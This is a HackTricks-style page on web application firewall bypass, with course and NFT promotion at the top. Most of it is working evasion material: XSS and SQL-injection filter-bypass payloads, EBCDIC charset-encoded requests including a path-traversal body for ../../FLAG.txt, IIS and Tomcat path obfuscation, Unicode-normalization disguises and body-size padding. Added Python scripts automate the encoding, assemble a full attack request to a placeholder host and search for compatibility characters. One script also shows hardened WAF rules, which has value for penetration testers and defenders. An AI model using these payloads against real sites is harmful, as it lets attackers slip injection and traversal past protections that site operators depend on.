# WAF Bypass
<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
## Regex bypass
Different techniques can be used to get past the regex filters of a WAF. They all exploit the same weakness: the rule matches a literal pattern against the raw request, while the browser or backend tolerates a different spelling of the same thing. Examples include alternating case, inserting line breaks and encoding the payload. Collections of such bypasses are kept at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below are taken from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parentheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #backticks inside a javascript: URL
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
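The following is an added example, not code from the page or from the article it cites, that shows why the variants above work. A naive rule set matches literal, case-sensitive signatures against the raw request and misses every variant; a rule set that canonicalises first (URL-decode until stable, decode HTML entities, strip control characters, lower-case) catches most of them. The payloads are constructed for the demo. The last one combines the Gecko-only handler syntax with a concatenated function name and shows that even the canonicalising rules still have gaps.

```python
import html
import re
import urllib.parse

# Constructed sample payloads (not from any real target): the first is what a
# naive signature expects, the rest are variants of the tricks listed above.
PAYLOADS = {
    "plain": "<script>alert(1)</script>",
    "case_and_backticks": "<sCrIpT>alert`1`</sCriPt>",
    "slash_for_space": "<img/src=1/onerror=alert`1`>",
    "html_entity": "%26%2397;lert(1)",  # &#97;lert(1) after URL decoding
    "lf_in_scheme": '<a href="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)">x</a>',
    # Gecko-only handler syntax plus a concatenated function name
    "gecko_handler": '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=self["al"+"ert"](1)>',
}

# A naive rule set: literal, case-sensitive signatures applied to the raw request.
NAIVE_RULES = [re.compile(p) for p in (r"<script>", r"alert\(", r"javascript:")]


def naive_waf_blocks(raw: str) -> bool:
    return any(rule.search(raw) for rule in NAIVE_RULES)


def normalize(raw: str) -> str:
    """Canonicalise the input the way a less naive WAF does before matching:
    URL-decode until stable, decode HTML entities, drop control characters
    (the %0A line feeds), and lower-case everything."""
    s = raw
    for _ in range(3):  # bounded loop: double-encoded payloads are common
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = html.unescape(s)
    s = re.sub(r"[\x00-\x1f\x7f]", "", s)
    return s.lower()


# Rules written against the normalised form: case no longer matters, backticks
# count as call syntax, and attribute separators other than space are allowed.
HARDENED_RULES = [re.compile(p) for p in (
    r"<script[\s/>]",                    # tag name followed by any separator
    r"\bon\w+\s*=",                      # event handler attribute: onerror=, onload =
    r"\b(alert|confirm|prompt)\s*[(`]",  # call with parentheses or a template literal
    r"javascript\s*:",
)]


def hardened_waf_blocks(raw: str) -> bool:
    return any(rule.search(normalize(raw)) for rule in HARDENED_RULES)


def evaluate() -> dict:
    """Return {name: (blocked_by_naive, blocked_by_hardened)} for every payload."""
    return {name: (naive_waf_blocks(p), hardened_waf_blocks(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in evaluate().items():
        print(f"{name:20} naive={'BLOCK' if naive else 'pass '}  "
              f"hardened={'BLOCK' if hardened else 'pass '}")
```

The `gecko_handler` entry passes both rule sets: the non-alphanumeric junk between `onload` and `=` defeats the `on\w+\s*=` rule, and the function name never appears as a contiguous token. Canonicalisation narrows the gap but does not close it; when testing a WAF, try each trick both on its own and in combination.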
## Charset encoding
```bash
# Charset encoding: declare a legacy (EBCDIC) charset in the Content-Type so the
# WAF's ASCII/UTF-8 signatures never match the bytes, while a backend that
# honours the charset parameter decodes them back into the payload
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037

## Python code
import urllib.parse
s = 'payload'
print(urllib.parse.quote_plus(s.encode("IBM037")))

## Request example (the body decodes as filename=../../FLAG.txt and x=<x> under ibm500)
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
```
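Added example (not HackTricks' own code) that carries the steps above through end to end, against a hypothetical endpoint `target.example/search` with a constructed payload: it encodes the payload in IBM037 and percent-encodes the bytes, shows that a WAF rule decoding the body as an ASCII-compatible charset finds nothing, and shows what a backend that honours the charset parameter decodes. The same decoder is used to check the request example above.

```python
import re
import urllib.parse

# Constructed payload (not from the page); any string the WAF would normally block.
PAYLOAD = "<script>alert(1)</script>"


def encode_for_charset(payload: str, charset: str = "ibm037") -> str:
    """Encode the payload in a legacy EBCDIC charset and percent-encode the bytes
    for an application/x-www-form-urlencoded body. Python's codec names 'ibm037'
    and 'ibm500' are aliases of cp037 and cp500."""
    return urllib.parse.quote_plus(payload.encode(charset))


def naive_waf_matches(raw_body: str) -> bool:
    """A WAF rule that percent-decodes the body as an ASCII-compatible charset and
    looks for '<script'. EBCDIC letters live at 0x81-0xA9 and 0xC1-0xE9, so they
    never line up with ASCII letters and the signature cannot match."""
    decoded = urllib.parse.unquote_plus(raw_body, encoding="latin-1")
    return re.search(r"<script", decoded, re.IGNORECASE) is not None


def backend_decodes(raw_body: str, charset: str) -> str:
    """What a backend that honours the Content-Type charset parameter sees.
    '+' is turned back into a space before percent-decoding to raw bytes."""
    raw_bytes = urllib.parse.unquote_to_bytes(raw_body.replace("+", " "))
    return raw_bytes.decode(charset)


def build_request(payload: str, charset: str = "ibm037") -> str:
    """Assemble a complete POST request (hypothetical host and path) carrying
    the payload in a parameter named q."""
    body = "q=" + encode_for_charset(payload, charset)
    return (
        "POST /search HTTP/1.1\r\n"
        "Host: target.example\r\n"
        f"Content-Type: application/x-www-form-urlencoded; charset={charset}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


if __name__ == "__main__":
    encoded = encode_for_charset(PAYLOAD)
    print("wire form       :", encoded)
    print("naive WAF match :", naive_waf_matches(encoded))
    print("backend decodes :", backend_decodes(encoded, "ibm037"))
    print(build_request(PAYLOAD))
```

Note that some EBCDIC bytes happen to be ASCII alphanumerics and pass through `quote_plus` unescaped (0x4B `.` shows up as `K`, 0x61 `/` as `a`, 0x4C `<` as `L`), which is why the request example above reads `KKaKKa` for `../../`. Whether this works depends entirely on the backend's form parser honouring the charset parameter; many frameworks ignore it and assume UTF-8, in which case the payload arrives as garbage.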
## Obfuscation
```bash
# IIS, ASP Classic: the server decodes %u-escapes (here %u0131, a dotless i that
# is best-fit mapped to "i") after the WAF has inspected the raw request
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat: path parameters (;name) are stripped before the
# path is matched, so a blacklist on the raw path never sees /path1/path2/
/path1/path2/ == ;/path1;foo/path2;bar/;
```
## Unicode compatibility
Depending on how Unicode normalization is implemented (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that are Unicode compatibility equivalents of the characters in a payload can get past the WAF and still be turned into the intended payload. This only works when the backend, or some component between the WAF and the application, applies NFKC or NFKD normalization after the WAF has inspected the raw request. Compatible characters can be looked up [here](https://www.compart.com/en/unicode).
### Example
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥ --> <img src=p onerror='prompt(1)'>
```
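Added example, not from the page, that generalises the table lookup above: it scans every code point with Python's `unicodedata` to find the characters whose compatibility decomposition is a given ASCII character, rewrites a payload with them so the literal signature characters disappear, and verifies that NFKD (and NFKC) normalization folds the disguised payload back to the original. The payload strings are constructed for the demo.

```python
import sys
import unicodedata
from functools import lru_cache


def normalize(s: str, form: str = "NFKD") -> str:
    """Apply a Unicode normalization form; NFKD/NFKC apply compatibility mappings."""
    return unicodedata.normalize(form, s)


@lru_cache(maxsize=None)
def _compat_index() -> dict:
    """One pass over every non-ASCII code point: map each ASCII character to the
    characters whose NFKD decomposition is exactly that character."""
    index = {}
    for cp in range(0x80, sys.maxunicode + 1):
        ch = chr(cp)
        folded = unicodedata.normalize("NFKD", ch)
        if len(folded) == 1 and folded.isascii():
            index.setdefault(folded, []).append(ch)
    return index


def compat_equivalents(target: str) -> list:
    """Characters a literal match for `target` will not see, but which a backend
    normalizing with NFKD/NFKC turns into `target`."""
    return list(_compat_index().get(target, []))


def disguise(payload: str, chars: str = "<>=()'\"/") -> str:
    """Replace every listed ASCII character with its first compatibility
    equivalent (by code point) so the payload no longer contains the bytes a
    signature looks for, while normalizing it yields the original again."""
    table = {ch: compat_equivalents(ch)[0] for ch in chars if compat_equivalents(ch)}
    return "".join(table.get(ch, ch) for ch in payload)


if __name__ == "__main__":
    # The page's example, written with escapes: U+207C, U+207D, U+207E, U+FE65
    page_payload = "<img src\u207cp onerror\u207c'prompt\u207d1\u207e'\ufe65"
    print(normalize(page_payload))
    original = "<img src=p onerror='prompt(1)'>"
    hidden = disguise(original)
    print(hidden, "->", normalize(hidden) == original)
    for ch in "<=(":
        print(repr(ch), [f"U+{ord(c):04X}" for c in compat_equivalents(ch)])
```

The scan also turns up letter equivalents (for instance U+017F LATIN SMALL LETTER LONG S folds to `s`, and the mathematical alphanumerics outside the BMP fold to plain letters), so a keyword such as `script` can be disguised the same way. Check how the target actually normalizes before relying on this: a backend that never calls NFKC/NFKD simply receives the odd characters and the payload does nothing.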
## Exceeding the size limit

Cloud-based WAFs inspect only a bounded prefix of each request body; a payload placed beyond size X is forwarded without inspection. AWS WAF, for example, inspects only the first 8 KB of a request body by default and lets the rest through unless an oversize-handling action is configured. Pad the request (for example with a large junk parameter placed before the real one) so that the malicious part lands past the inspected size.

## IP rotation
* [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin)